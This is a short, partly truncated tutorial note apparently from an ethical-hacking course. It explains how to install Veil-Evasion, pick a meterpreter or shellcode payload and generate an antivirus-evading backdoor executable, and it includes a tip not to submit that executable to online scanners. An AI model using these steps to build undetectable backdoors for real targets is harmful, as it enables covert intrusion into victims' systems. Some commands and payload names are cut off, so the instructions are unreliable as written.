Ethical Hacking - GAINING ACCESS(10)
- Use if server-side attacks fail.
- If IP is probably useless.
- Require user interaction.
- Social engineering can be very useful.
- Information gathering is vital.
Generating an undetectable backdoor using VEIL-EVASION
1. Install veil-evasion
apt-get install veil-evasion
apt -y install veil
/usr/share/veil/config/ --force --silent
sudo apt-get -y install git
git clone
cd Veil/
./config/ --force --silent
2. Run veil-evasion
Choose evasion tool:
3. Select a backdoor/payload
use [payload number]
List all the available payloads.
[*] Available Payloads: 1) autoit/shellcode_inject/ 2) auxiliary/
3) auxiliary/
4) auxiliary/ 5) c/meterpreter/
6) c/meterpreter/
7) c/meterpreter/
8) c/meterpreter/ 9) cs/meterpreter/
10) cs/meterpreter/
11) cs/meterpreter/
12) cs/shellcode_inject/
13) cs/shellcode_inject/ 14) go/meterpreter/
15) go/meterpreter/
16) go/meterpreter/
17) go/shellcode_inject/ 18) lua/shellcode_inject/ 19) perl/shellcode_inject/ 20) powershell/meterpreter/
21) powershell/meterpreter/
22) powershell/meterpreter/
23) powershell/shellcode_inject/
24) powershell/shellcode_inject/ 25) python/meterpreter/
26) python/meterpreter/
27) python/meterpreter/
28) python/meterpreter/
29) python/shellcode_inject/
30) python/shellcode_inject/
31) python/shellcode_inject/
32) python/shellcode_inject/
33) python/shellcode_inject/
34) python/shellcode_inject/
35) python/shellcode_inject/
36) python/shellcode_inject/ 37) ruby/meterpreter/
38) ruby/meterpreter/
39) ruby/meterpreter/
40) ruby/shellcode_inject/
41) ruby/shellcode_inject/
Choose a specific payload.
4. Set options
set [option][value]
5. Generate backdoor
Generate a new backdoor successfully. /var/lib/veil/output/compiled/backdoor.exe.exe
Be careful: Don't submit to any online scanner! And don't use it illegally!
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